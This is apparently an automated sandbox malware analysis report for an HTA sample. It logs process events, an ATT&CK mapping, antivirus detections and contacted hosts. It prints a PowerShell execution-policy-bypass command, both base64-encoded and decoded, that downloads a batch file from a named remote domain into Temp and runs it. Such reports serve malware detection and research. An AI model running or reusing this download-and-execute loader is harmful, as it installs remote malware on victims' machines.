Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5887Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2148Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4340Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3060Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6692Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000000.00000003.1734876931.0000000003316000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000000.00000003.1734876931.0000000003316000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000002.00000002.1729801596.00000000073FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
Encrypted powershell cmdline option found
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;https://candwfarmsllc.com/c2.bat='https://candwfarmsllc.com/c2.bat';C:\Users\asaol\AppData\Local\Temp\c2.bat=C:\Users\asaol\AppData\Local\Temp + '\c2.bat';Invoke-WebRequest -Uri https://candwfarmsllc.com/c2.bat -OutFile C:\Users\asaol\AppData\Local\Temp\c2.bat;Start-Process -FilePath C:\Users\asaol\AppData\Local\Temp\c2.bat -NoNewWindow
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;https://candwfarmsllc.com/c2.bat='https://candwfarmsllc.com/c2.bat';C:\Users\asaol\AppData\Local\Temp\c2.bat=C:\Users\asaol\AppData\Local\Temp + '\c2.bat';Invoke-WebRequest -Uri https://candwfarmsllc.com/c2.bat -OutFile C:\Users\asaol\AppData\Local\Temp\c2.bat;Start-Process -FilePath C:\Users\asaol\AppData\Local\Temp\c2.bat -NoNewWindowJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -encodedcommand wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamga7aa0acgboahqadabwahmaogavac8aywbhag4azab3agyayqbyag0acwbsagwaywauagmabwbtac8aywayac4aygbhahqapqanaggadab0ahaacwa6ac8alwbjageabgbkahcazgbhahiabqbzagwababjac4aywbvag0alwbjadialgbiageadaanadsadqakaemaogbcafuacwblahiacwbcageacwbhag8ababcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaywayac4aygbhahqapqbdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acaagacsaiaanafwaywayac4aygbhahqajwa7aa0acgbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaaaab0ahqacabzadoalwavagmayqbuagqadwbmageacgbtahmababsagmalgbjag8abqavagmamgauagiayqb0acaalqbpahuadabgagkabablacaaqwa6afwavqbzaguacgbzafwayqbzageabwbsafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxabjadialgbiageadaa7aa0acgbtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcagmamgauagiayqb0acaalqboag8atgblahcavwbpag4azabvahca
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -encodedcommand wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamga7aa0acgboahqadabwahmaogavac8aywbhag4azab3agyayqbyag0acwbsagwaywauagmabwbtac8aywayac4aygbhahqapqanaggadab0ahaacwa6ac8alwbjageabgbkahcazgbhahiabqbzagwababjac4aywbvag0alwbjadialgbiageadaanadsadqakaemaogbcafuacwblahiacwbcageacwbhag8ababcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaywayac4aygbhahqapqbdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acaagacsaiaanafwaywayac4aygbhahqajwa7aa0acgbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaaaab0ahqacabzadoalwavagmayqbuagqadwbmageacgbtahmababsagmalgbjag8abqavagmamgauagiayqb0acaalqbpahuadabgagkabablacaaqwa6afwavqbzaguacgbzafwayqbzageabwbsafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxabjadialgbiageadaa7aa0acgbtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcagmamgauagiayqb0acaalqboag8atgblahcavwbpag4azabvahcaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		21
Virtualization/Sandbox Evasion		OS Credential Dumping1
Security Software Discovery		Remote Services1
Email Collection		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
c2.hta11%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://candwfarmsllc.com/c2.bat100%Avira URL Cloudmalware
https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.bat0%Avira URL Cloudsafe
http://candwfarmsllc.com0%Avira URL Cloudsafe
http://crl.micro.0%Avira URL Cloudsafe
https://candwfarmsllc.com/c2.bat=0%Avira URL Cloudsafe
https://candwfarmsllc.com0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
candwfarmsllc.com
193.26.115.39
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://candwfarmsllc.com/c2.batfalse
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.micro.powershell.exe, 00000002.00000002.1724014586.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://candwfarmsllc.compowershell.exe, 00000002.00000002.1725181510.0000000004A95000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://candwfarmsllc.com/c2.bat=powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://myguyapp.com/msword.zippowershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1725181510.0000000004B13000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://myguyapp.com/W2.pdfpowershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1725181510.0000000004B13000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://crl.microsoftpowershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://go.micropowershell.exe, 00000002.00000002.1725181510.000000000516D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://candwfarmsllc.compowershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.batpowershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                193.26.115.39
                                		candwfarmsllc.comNetherlands
                                		46261QUICKPACKETUSfalse

                                General Information

                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1589450
                                Start date and time:2025-01-12 15:35:17 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 48s
